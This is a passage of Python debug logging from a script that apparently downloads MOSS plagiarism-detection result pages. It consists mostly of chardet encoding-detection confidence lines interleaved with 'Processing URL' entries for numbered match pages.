24655\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19377\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21468\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32122\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19364\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21455\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32109\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19377\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21468\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24643\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19364\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32122\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21455\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24642\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19364\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32109\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21455\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19365\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32109\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19364\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21456\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32110\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21455\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32109\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5356908501917945\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5596514495832396\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5338923655373736\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match119-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match119-1.html\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5321814954628881\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5325538318113453\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match121-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match121-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match121-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match122-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match122-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match122-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17085\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17072\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19088\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17085\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19075\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24642\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17072\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19088\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24655\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17072\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19075\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17073\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19075\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24642\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17072\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19076\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24643\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19075\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24642\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5351951358153133\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5286629515626814\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5430007169640202\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5450726049544079\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5321814954628881\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match125-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match125-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match125-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match128-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match128-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match128-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match126-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match126-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match126-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16351\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16338\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16351\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16338\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16338\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16339\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16338\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32291\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16126\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32278\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16113\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32291\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16126\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32278\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match123-top.html\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16113\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32278\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16113\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32279\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16114\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32278\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16113\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5430379359377011\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew 